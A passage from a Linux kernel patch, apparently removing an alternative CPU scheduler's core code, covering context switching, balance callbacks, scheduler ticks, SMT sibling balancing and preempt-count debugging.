-+	struct balance_callback *next;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	while (head) {
-+		func = (void (*)(struct rq *))head->func;
-+		next = head->next;
-+		head->next = NULL;
-+		head = next;
-+
-+		func(rq);
-+	}
-+}
-+
-+static void balance_push(struct rq *rq);
-+
-+/*
-+ * balance_push_callback is a right abuse of the callback interface and plays
-+ * by significantly different rules.
-+ *
-+ * Where the normal balance_callback's purpose is to be ran in the same context
-+ * that queued it (only later, when it's safe to drop rq->lock again),
-+ * balance_push_callback is specifically targeted at __schedule().
-+ *
-+ * This abuse is tolerated because it places all the unlikely/odd cases behind
-+ * a single test, namely: rq->balance_callback == NULL.
-+ */
-+struct balance_callback balance_push_callback = {
-+	.next = NULL,
-+	.func = balance_push,
-+};
-+
-+static inline struct balance_callback *
-+__splice_balance_callbacks(struct rq *rq, bool split)
-+{
-+	struct balance_callback *head = rq->balance_callback;
-+
-+	if (likely(!head))
-+		return NULL;
-+
-+	lockdep_assert_rq_held(rq);
-+	/*
-+	 * Must not take balance_push_callback off the list when
-+	 * splice_balance_callbacks() and balance_callbacks() are not
-+	 * in the same rq->lock section.
-+	 *
-+	 * In that case it would be possible for __schedule() to interleave
-+	 * and observe the list empty.
-+	 */
-+	if (split && head == &balance_push_callback)
-+		head = NULL;
-+	else
-+		rq->balance_callback = NULL;
-+
-+	return head;
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return __splice_balance_callbacks(rq, true);
-+}
-+
-+static void __balance_callbacks(struct rq *rq)
-+{
-+	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	unsigned long flags;
-+
-+	if (unlikely(head)) {
-+		raw_spin_lock_irqsave(&rq->lock, flags);
-+		do_balance_callbacks(rq, head);
-+		raw_spin_unlock_irqrestore(&rq->lock, flags);
-+	}
-+}
-+
-+#else
-+
-+static inline void __balance_callbacks(struct rq *rq)
-+{
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return NULL;
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+}
-+
-+#endif
-+
-+static inline void
-+prepare_lock_switch(struct rq *rq, struct task_struct *next)
-+{
-+	/*
-+	 * Since the runqueue lock will be released by the next
-+	 * task (which is an invalid locking op but in the case
-+	 * of the scheduler it's an obvious special-case), so we
-+	 * do an early lockdep release here:
-+	 */
-+	spin_release(&rq->lock.dep_map, _THIS_IP_);
-+#ifdef CONFIG_DEBUG_SPINLOCK
-+	/* this is a valid case when another task releases the spinlock */
-+	rq->lock.owner = next;
-+#endif
-+}
-+
-+static inline void finish_lock_switch(struct rq *rq)
-+{
-+	/*
-+	 * If we are tracking spinlock dependencies then we have to
-+	 * fix up the runqueue lock - which gets 'carried over' from
-+	 * prev into current:
-+	 */
-+	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
-+	__balance_callbacks(rq);
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+/*
-+ * NOP if the arch has not defined these:
-+ */
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+static inline void kmap_local_sched_out(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_out();
-+#endif
-+}
-+
-+static inline void kmap_local_sched_in(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_in();
-+#endif
-+}
-+
-+/**
-+ * prepare_task_switch - prepare to switch tasks
-+ * @rq: the runqueue preparing to switch
-+ * @next: the task we are going to switch to.
-+ *
-+ * This is called with the rq lock held and interrupts off. It must
-+ * be paired with a subsequent finish_task_switch after the context
-+ * switch.
-+ *
-+ * prepare_task_switch sets up locking and calls architecture specific
-+ * hooks.
-+ */
-+static inline void
-+prepare_task_switch(struct rq *rq, struct task_struct *prev,
-+		    struct task_struct *next)
-+{
-+	kcov_prepare_switch(prev);
-+	sched_info_switch(rq, prev, next);
-+	perf_event_task_sched_out(prev, next);
-+	rseq_preempt(prev);
-+	fire_sched_out_preempt_notifiers(prev, next);
-+	kmap_local_sched_out();
-+	prepare_task(next);
-+	prepare_arch_switch(next);
-+}
-+
-+/**
-+ * finish_task_switch - clean up after a task-switch
-+ * @rq: runqueue associated with task-switch
-+ * @prev: the thread we just switched away from.
-+ *
-+ * finish_task_switch must be called after the context switch, paired
-+ * with a prepare_task_switch call before the context switch.
-+ * finish_task_switch will reconcile locking set up by prepare_task_switch,
-+ * and do any other architecture-specific cleanup actions.
-+ *
-+ * Note that we may have delayed dropping an mm in context_switch(). If
-+ * so, we finish that here outside of the runqueue lock.  (Doing it
-+ * with the lock held can cause deadlocks; see schedule() for
-+ * details.)
-+ *
-+ * The context switch have flipped the stack from under us and restored the
-+ * local variables which were saved when this task called schedule() in the
-+ * past. prev == current is still correct but we need to recalculate this_rq
-+ * because prev may have moved to another CPU.
-+ */
-+static struct rq *finish_task_switch(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	struct rq *rq = this_rq();
-+	struct mm_struct *mm = rq->prev_mm;
-+	unsigned int prev_state;
-+
-+	/*
-+	 * The previous task will have left us with a preempt_count of 2
-+	 * because it left us after:
-+	 *
-+	 *	schedule()
-+	 *	  preempt_disable();			// 1
-+	 *	  __schedule()
-+	 *	    raw_spin_lock_irq(&rq->lock)	// 2
-+	 *
-+	 * Also, see FORK_PREEMPT_COUNT.
-+	 */
-+	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
-+		      "corrupted preempt_count: %s/%d/0x%x\n",
-+		      current->comm, current->pid, preempt_count()))
-+		preempt_count_set(FORK_PREEMPT_COUNT);
-+
-+	rq->prev_mm = NULL;
-+
-+	/*
-+	 * A task struct has one reference for the use as "current".
-+	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
-+	 * schedule one last time. The schedule call will never return, and
-+	 * the scheduled task must drop that reference.
-+	 *
-+	 * We must observe prev->state before clearing prev->on_cpu (in
-+	 * finish_task), otherwise a concurrent wakeup can get prev
-+	 * running on another CPU and we could rave with its RUNNING -> DEAD
-+	 * transition, resulting in a double drop.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	vtime_task_switch(prev);
-+	perf_event_task_sched_in(prev, current);
-+	finish_task(prev);
-+	tick_nohz_task_switch();
-+	finish_lock_switch(rq);
-+	finish_arch_post_lock_switch();
-+	kcov_finish_switch(current);
-+	/*
-+	 * kmap_local_sched_out() is invoked with rq::lock held and
-+	 * interrupts disabled. There is no requirement for that, but the
-+	 * sched out code does not have an interrupt enabled section.
-+	 * Restoring the maps on sched in does not require interrupts being
-+	 * disabled either.
-+	 */
-+	kmap_local_sched_in();
-+
-+	fire_sched_in_preempt_notifiers(current);
-+	/*
-+	 * When switching through a kernel thread, the loop in
-+	 * membarrier_{private,global}_expedited() may have observed that
-+	 * kernel thread and not issued an IPI. It is therefore possible to
-+	 * schedule between user->kernel->user threads without passing though
-+	 * switch_mm(). Membarrier requires a barrier after storing to
-+	 * rq->curr, before returning to userspace, so provide them here:
-+	 *
-+	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
-+	 *   provided by mmdrop(),
-+	 * - a sync_core for SYNC_CORE.
-+	 */
-+	if (mm) {
-+		membarrier_mm_sync_core_before_usermode(mm);
-+		mmdrop_sched(mm);
-+	}
-+	if (unlikely(prev_state == TASK_DEAD)) {
-+		/* Task is done with its stack. */
-+		put_task_stack(prev);
-+
-+		put_task_struct_rcu_user(prev);
-+	}
-+
-+	return rq;
-+}
-+
-+/**
-+ * schedule_tail - first thing a freshly forked thread must call.
-+ * @prev: the thread we just switched away from.
-+ */
-+asmlinkage __visible void schedule_tail(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	/*
-+	 * New tasks start with FORK_PREEMPT_COUNT, see there and
-+	 * finish_task_switch() for details.
-+	 *
-+	 * finish_task_switch() will drop rq->lock() and lower preempt_count
-+	 * and the preempt_enable() will end up enabling preemption (on
-+	 * PREEMPT_COUNT kernels).
-+	 */
-+
-+	finish_task_switch(prev);
-+	preempt_enable();
-+
-+	if (current->set_child_tid)
-+		put_user(task_pid_vnr(current), current->set_child_tid);
-+
-+	calculate_sigpending();
-+}
-+
-+/*
-+ * context_switch - switch to the new MM and the new thread's register state.
-+ */
-+static __always_inline struct rq *
-+context_switch(struct rq *rq, struct task_struct *prev,
-+	       struct task_struct *next)
-+{
-+	prepare_task_switch(rq, prev, next);
-+
-+	/*
-+	 * For paravirt, this is coupled with an exit in switch_to to
-+	 * combine the page table reload and the switch backend into
-+	 * one hypercall.
-+	 */
-+	arch_start_context_switch(prev);
-+
-+	/*
-+	 * kernel -> kernel   lazy + transfer active
-+	 *   user -> kernel   lazy + mmgrab() active
-+	 *
-+	 * kernel ->   user   switch + mmdrop() active
-+	 *   user ->   user   switch
-+	 */
-+	if (!next->mm) {                                // to kernel
-+		enter_lazy_tlb(prev->active_mm, next);
-+
-+		next->active_mm = prev->active_mm;
-+		if (prev->mm)                           // from user
-+			mmgrab(prev->active_mm);
-+		else
-+			prev->active_mm = NULL;
-+	} else {                                        // to user
-+		membarrier_switch_mm(rq, prev->active_mm, next->mm);
-+		/*
-+		 * sys_membarrier() requires an smp_mb() between setting
-+		 * rq->curr / membarrier_switch_mm() and returning to userspace.
-+		 *
-+		 * The below provides this either through switch_mm(), or in
-+		 * case 'prev->active_mm == next->mm' through
-+		 * finish_task_switch()'s mmdrop().
-+		 */
-+		switch_mm_irqs_off(prev->active_mm, next->mm, next);
-+		lru_gen_use_mm(next->mm);
-+
-+		if (!prev->mm) {                        // from kernel
-+			/* will mmdrop() in finish_task_switch(). */
-+			rq->prev_mm = prev->active_mm;
-+			prev->active_mm = NULL;
-+		}
-+	}
-+
-+	prepare_lock_switch(rq, next);
-+
-+	/* Here we just switch the register state and the stack. */
-+	switch_to(prev, next, prev);
-+	barrier();
-+
-+	return finish_task_switch(prev);
-+}
-+
-+/*
-+ * nr_running, nr_uninterruptible and nr_context_switches:
-+ *
-+ * externally visible scheduler statistics: current number of runnable
-+ * threads, total number of context switches performed since bootup.
-+ */
-+unsigned int nr_running(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_online_cpu(i)
-+		sum += cpu_rq(i)->nr_running;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Check if only the current task is running on the CPU.
-+ *
-+ * Caution: this function does not check that the caller has disabled
-+ * preemption, thus the result might have a time-of-check-to-time-of-use
-+ * race.  The caller is responsible to use it correctly, for example:
-+ *
-+ * - from a non-preemptible section (of course)
-+ *
-+ * - from a thread that is bound to a single CPU
-+ *
-+ * - in a loop with very short iterations (e.g. a polling loop)
-+ */
-+bool single_task_running(void)
-+{
-+	return raw_rq()->nr_running == 1;
-+}
-+EXPORT_SYMBOL(single_task_running);
-+
-+unsigned long long nr_context_switches(void)
-+{
-+	int i;
-+	unsigned long long sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += cpu_rq(i)->nr_switches;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Consumers of these two interfaces, like for example the cpuidle menu
-+ * governor, are using nonsensical data. Preferring shallow idle state selection
-+ * for a CPU that has IO-wait which might not even end up running the task when
-+ * it does become runnable.
-+ */
-+
-+unsigned int nr_iowait_cpu(int cpu)
-+{
-+	return atomic_read(&cpu_rq(cpu)->nr_iowait);
-+}
-+
-+/*
-+ * IO-wait accounting, and how it's mostly bollocks (on SMP).
-+ *
-+ * The idea behind IO-wait account is to account the idle time that we could
-+ * have spend running if it were not for IO. That is, if we were to improve the
-+ * storage performance, we'd have a proportional reduction in IO-wait time.
-+ *
-+ * This all works nicely on UP, where, when a task blocks on IO, we account
-+ * idle time as IO-wait, because if the storage were faster, it could've been
-+ * running and we'd not be idle.
-+ *
-+ * This has been extended to SMP, by doing the same for each CPU. This however
-+ * is broken.
-+ *
-+ * Imagine for instance the case where two tasks block on one CPU, only the one
-+ * CPU will have IO-wait accounted, while the other has regular idle. Even
-+ * though, if the storage were faster, both could've ran at the same time,
-+ * utilising both CPUs.
-+ *
-+ * This means, that when looking globally, the current IO-wait accounting on
-+ * SMP is a lower bound, by reason of under accounting.
-+ *
-+ * Worse, since the numbers are provided per CPU, they are sometimes
-+ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
-+ * associated with any one particular CPU, it can wake to another CPU than it
-+ * blocked on. This means the per CPU IO-wait number is meaningless.
-+ *
-+ * Task CPU affinities can make all that even more 'interesting'.
-+ */
-+
-+unsigned int nr_iowait(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += nr_iowait_cpu(i);
-+
-+	return sum;
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+/*
-+ * sched_exec - execve() is a valuable balancing opportunity, because at
-+ * this point the task has the smallest effective memory and cache
-+ * footprint.
-+ */
-+void sched_exec(void)
-+{
-+}
-+
-+#endif
-+
-+DEFINE_PER_CPU(struct kernel_stat, kstat);
-+DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
-+
-+EXPORT_PER_CPU_SYMBOL(kstat);
-+EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
-+
-+static inline void update_curr(struct rq *rq, struct task_struct *p)
-+{
-+	s64 ns = rq->clock_task - p->last_ran;
-+
-+	p->sched_time += ns;
-+	cgroup_account_cputime(p, ns);
-+	account_group_exec_runtime(p, ns);
-+
-+	p->time_slice -= ns;
-+	p->last_ran = rq->clock_task;
-+}
-+
-+/*
-+ * Return accounted runtime for the task.
-+ * Return separately the current's pending runtime that have not been
-+ * accounted yet.
-+ */
-+unsigned long long task_sched_runtime(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	u64 ns;
-+
-+#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
-+	/*
-+	 * 64-bit doesn't need locks to atomically read a 64-bit value.
-+	 * So we have a optimization chance when the task's delta_exec is 0.
-+	 * Reading ->on_cpu is racy, but this is ok.
-+	 *
-+	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
-+	 * If we race with it entering CPU, unaccounted time is 0. This is
-+	 * indistinguishable from the read occurring a few cycles earlier.
-+	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
-+	 * been accounted, so we're correct here as well.
-+	 */
-+	if (!p->on_cpu || !task_on_rq_queued(p))
-+		return tsk_seruntime(p);
-+#endif
-+
-+	rq = task_access_lock_irqsave(p, &lock, &flags);
-+	/*
-+	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
-+	 * project cycles that may never be accounted to this
-+	 * thread, breaking clock_gettime().
-+	 */
-+	if (p == rq->curr && task_on_rq_queued(p)) {
-+		update_rq_clock(rq);
-+		update_curr(rq, p);
-+	}
-+	ns = tsk_seruntime(p);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+	return ns;
-+}
-+
-+/* This manages tasks that have run out of timeslice during a scheduler_tick */
-+static inline void scheduler_task_tick(struct rq *rq)
-+{
-+	struct task_struct *p = rq->curr;
-+
-+	if (is_idle_task(p))
-+		return;
-+
-+	update_curr(rq, p);
-+	cpufreq_update_util(rq, 0);
-+
-+	/*
-+	 * Tasks have less than RESCHED_NS of time slice left they will be
-+	 * rescheduled.
-+	 */
-+	if (p->time_slice >= RESCHED_NS)
-+		return;
-+	set_tsk_need_resched(p);
-+	set_preempt_need_resched();
-+}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+static u64 cpu_resched_latency(struct rq *rq)
-+{
-+	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
-+	u64 resched_latency, now = rq_clock(rq);
-+	static bool warned_once;
-+
-+	if (sysctl_resched_latency_warn_once && warned_once)
-+		return 0;
-+
-+	if (!need_resched() || !latency_warn_ms)
-+		return 0;
-+
-+	if (system_state == SYSTEM_BOOTING)
-+		return 0;
-+
-+	if (!rq->last_seen_need_resched_ns) {
-+		rq->last_seen_need_resched_ns = now;
-+		rq->ticks_without_resched = 0;
-+		return 0;
-+	}
-+
-+	rq->ticks_without_resched++;
-+	resched_latency = now - rq->last_seen_need_resched_ns;
-+	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
-+		return 0;
-+
-+	warned_once = true;
-+
-+	return resched_latency;
-+}
-+
-+static int __init setup_resched_latency_warn_ms(char *str)
-+{
-+	long val;
-+
-+	if ((kstrtol(str, 0, &val))) {
-+		pr_warn("Unable to set resched_latency_warn_ms\n");
-+		return 1;
-+	}
-+
-+	sysctl_resched_latency_warn_ms = val;
-+	return 1;
-+}
-+__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
-+#else
-+static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+/*
-+ * This function gets called by the timer code, with HZ frequency.
-+ * We call it with interrupts disabled.
-+ */
-+void scheduler_tick(void)
-+{
-+	int cpu __maybe_unused = smp_processor_id();
-+	struct rq *rq = cpu_rq(cpu);
-+	u64 resched_latency;
-+
-+	arch_scale_freq_tick();
-+	sched_clock_tick();
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	scheduler_task_tick(rq);
-+	if (sched_feat(LATENCY_WARN))
-+		resched_latency = cpu_resched_latency(rq);
-+	calc_global_load_tick(rq);
-+
-+	rq->last_tick = rq->clock;
-+	raw_spin_unlock(&rq->lock);
-+
-+	if (sched_feat(LATENCY_WARN) && resched_latency)
-+		resched_latency_warn(cpu, resched_latency);
-+
-+	perf_event_task_tick();
-+}
-+
-+#ifdef CONFIG_SCHED_SMT
-+static inline int sg_balance_cpu_stop(void *data)
-+{
-+	struct rq *rq = this_rq();
-+	struct task_struct *p = data;
-+	cpumask_t tmp;
-+	unsigned long flags;
-+
-+	local_irq_save(flags);
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->active_balance = 0;
-+	/* _something_ may have changed the task, double check again */
-+	if (task_on_rq_queued(p) && task_rq(p) == rq &&
-+	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
-+	    !is_migration_disabled(p)) {
-+		int cpu = cpu_of(rq);
-+		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
-+		rq = move_queued_task(rq, p, dcpu);
-+	}
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock(&p->pi_lock);
-+
-+	local_irq_restore(flags);
-+
-+	return 0;
-+}
-+
-+/* sg_balance_trigger - trigger slibing group balance for @cpu */
-+static inline int sg_balance_trigger(const int cpu)
-+{
-+	struct rq *rq= cpu_rq(cpu);
-+	unsigned long flags;
-+	struct task_struct *curr;
-+	int res;
-+
-+	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
-+		return 0;
-+	curr = rq->curr;
-+	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&\
-+	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&\
-+	      !is_migration_disabled(curr) && (!rq->active_balance);
-+
-+	if (res)
-+		rq->active_balance = 1;
-+
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	if (res)
-+		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
-+				    &rq->active_balance_work);
-+	return res;
-+}
-+
-+/*
-+ * sg_balance - slibing group balance check for run queue @rq
-+ */
-+static inline void sg_balance(struct rq *rq)
-+{
-+	cpumask_t chk;
-+	int cpu = cpu_of(rq);
-+
-+	/* exit when cpu is offline */
-+	if (unlikely(!rq->online))
-+		return;
-+
-+	/*
-+	 * Only cpu in slibing idle group will do the checking and then
-+	 * find potential cpus which can migrate the current running task
-+	 */
-+	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
-+	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
-+	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
-+		int i;
-+
-+		for_each_cpu_wrap(i, &chk, cpu) {
-+			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&\
-+			    sg_balance_trigger(i))
-+				return;
-+		}
-+	}
-+}
-+#endif /* CONFIG_SCHED_SMT */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+
-+struct tick_work {
-+	int			cpu;
-+	atomic_t		state;
-+	struct delayed_work	work;
-+};
-+/* Values for ->state, see diagram below. */
-+#define TICK_SCHED_REMOTE_OFFLINE	0
-+#define TICK_SCHED_REMOTE_OFFLINING	1
-+#define TICK_SCHED_REMOTE_RUNNING	2
-+
-+/*
-+ * State diagram for ->state:
-+ *
-+ *
-+ *          TICK_SCHED_REMOTE_OFFLINE
-+ *                    |   ^
-+ *                    |   |
-+ *                    |   | sched_tick_remote()
-+ *                    |   |
-+ *                    |   |
-+ *                    +--TICK_SCHED_REMOTE_OFFLINING
-+ *                    |   ^
-+ *                    |   |
-+ * sched_tick_start() |   | sched_tick_stop()
-+ *                    |   |
-+ *                    V   |
-+ *          TICK_SCHED_REMOTE_RUNNING
-+ *
-+ *
-+ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
-+ * and sched_tick_start() are happy to leave the state in RUNNING.
-+ */
-+
-+static struct tick_work __percpu *tick_work_cpu;
-+
-+static void sched_tick_remote(struct work_struct *work)
-+{
-+	struct delayed_work *dwork = to_delayed_work(work);
-+	struct tick_work *twork = container_of(dwork, struct tick_work, work);
-+	int cpu = twork->cpu;
-+	struct rq *rq = cpu_rq(cpu);
-+	struct task_struct *curr;
-+	unsigned long flags;
-+	u64 delta;
-+	int os;
-+
-+	/*
-+	 * Handle the tick only if it appears the remote CPU is running in full
-+	 * dynticks mode. The check is racy by nature, but missing a tick or
-+	 * having one too much is no big deal because the scheduler tick updates
-+	 * statistics and checks timeslices in a time-independent way, regardless
-+	 * of when exactly it is running.
-+	 */
-+	if (!tick_nohz_tick_stopped_cpu(cpu))
-+		goto out_requeue;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	curr = rq->curr;
-+	if (cpu_is_offline(cpu))
-+		goto out_unlock;
-+
-+	update_rq_clock(rq);
-+	if (!is_idle_task(curr)) {
-+		/*
-+		 * Make sure the next tick runs within a reasonable
-+		 * amount of time.
-+		 */
-+		delta = rq_clock_task(rq) - curr->last_ran;
-+		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
-+	}
-+	scheduler_task_tick(rq);
-+
-+	calc_load_nohz_remote(rq);
-+out_unlock:
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out_requeue:
-+	/*
-+	 * Run the remote tick once per second (1Hz). This arbitrary
-+	 * frequency is large enough to avoid overload but short enough
-+	 * to keep scheduler internal stats reasonably up to date.  But
-+	 * first update state to reflect hotplug activity if required.
-+	 */
-+	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
-+	if (os == TICK_SCHED_REMOTE_RUNNING)
-+		queue_delayed_work(system_unbound_wq, dwork, HZ);
-+}
-+
-+static void sched_tick_start(int cpu)
-+{
-+	int os;
-+	struct tick_work *twork;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
-+	if (os == TICK_SCHED_REMOTE_OFFLINE) {
-+		twork->cpu = cpu;
-+		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
-+		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
-+	}
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+static void sched_tick_stop(int cpu)
-+{
-+	struct tick_work *twork;
-+	int os;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	/* There cannot be competing actions, but don't rely on stop-machine. */
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
-+	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
-+	/* Don't cancel, as this would mess up the state machine. */
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+int __init sched_tick_offload_init(void)
-+{
-+	tick_work_cpu = alloc_percpu(struct tick_work);
-+	BUG_ON(!tick_work_cpu);
-+	return 0;
-+}
-+
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_tick_start(int cpu) { }
-+static inline void sched_tick_stop(int cpu) { }
-+#endif
-+
-+#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
-+				defined(CONFIG_PREEMPT_TRACER))
-+/*
-+ * If the value passed in is equal to the current preempt count
-+ * then we just disabled preemption. Start timing the latency.
-+ */
-+static inline void preempt_latency_start(int val)
-+{
-+	if (preempt_count() == val) {
-+		unsigned long ip = get_lock_parent_ip();
-+#ifdef CONFIG_DEBUG_PREEMPT
-+		current->preempt_disable_ip = ip;
-+#endif
-+		trace_preempt_off(CALLER_ADDR0, ip);
-+	}
-+}
-+
-+void preempt_count_add(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
-+		return;
-+#endif
-+	__preempt_count_add(val);
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Spinlock count overflowing soon?
-+	 */
-+	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
-+				PREEMPT_MASK - 10);
-+#endif
-+	preempt_latency_start(val);
-+}
-+EXPORT_SYMBOL(preempt_count_add);
-+NOKPROBE_SYMBOL(preempt_count_add);
-+
-+/*
-+ * If the value passed in equals to the current preempt count
-+ * then we just enabled preemption. Stop timing the latency.
-+ */
-+static inline void preempt_latency_stop(int val)
-+{
-+	if (preempt_count() == val)
-+		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
-+}
-+
-+void preempt_count_sub(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
-+		return;
-+	/*
-+	 * Is the spinlock portion underflowing?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
-+			!(preempt_count() & PREEMPT_MASK)))
-+		return;
-+#endif
-+
-+	preempt_latency_stop(val);
-+	__preempt_count_sub(val);
-+}
-+EXPORT_SYMBOL(preempt_count_sub);
-+NOKPROBE_SYMBOL(preempt_count_sub);
-+
-+#else
-+static inline void preempt_latency_start(int val) { }
-+static inline void preempt_latency_stop(int val) { }
-+#endif
-+
-+static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	return p->preempt_disable_ip;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+/*
-+ * Print scheduling while atomic bug:
-+ */
-+static noinline void __schedule_bug(struct task_struct *prev)
-+{
-+	/* Save this before calling printk(), since that will clobber it */
-+	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	if (oops_in_progress)
-+		return;
-+
-+	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
-+		prev->comm, prev->pid, preempt_count());
-+
-+	debug_show_held_locks(prev);
-+	print_modules();
-+	if (irqs_disabled())
-+		print_irqtrace_events(prev);
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
-+	    && in_atomic_preempt_off()) {
-+		pr_err("Preemption disabled at:");
-+		print_ip_sym(KERN_ERR, preempt_disable_ip);
-+	}
-+	if (panic_on_warn)
-+		panic("scheduling while atomic\n");
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+
-+/*
-+ * Various schedule()-time debugging checks and statistics:
-+ */
-+static inline void schedule_debug(struct task_struct *prev, bool preempt)
-+{
-+#ifdef CONFIG_SCHED_STACK_END_CHECK
-+	if (task_stack_end_corrupted(prev))
-+		panic("corrupted stack end detected inside scheduler\n");
-+
-+	if (task_scs_end_corrupted(prev))
-+		panic("corrupted shadow stack detected inside scheduler\n");
-+#endif
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
-+		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
-+			prev->comm, prev->pid, prev->non_block_count);
-+		dump_stack();
-+		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+	}
-+#endif
-+
-+	if (unlikely(in_atomic_preempt_off())) {
-+		__schedule_bug(prev);
-+		preempt_count_set(PREEMPT_DISABLED);
-+	}
-+	rcu_sleep_check();
-+	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
-+
-+	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
-+
-+	schedstat_inc(this_rq()->sched_count);
-+}
-+
-+/*
-+ * Compile time debug macro
-+ * #define ALT_SCHED_DEBUG
-+ */
-+
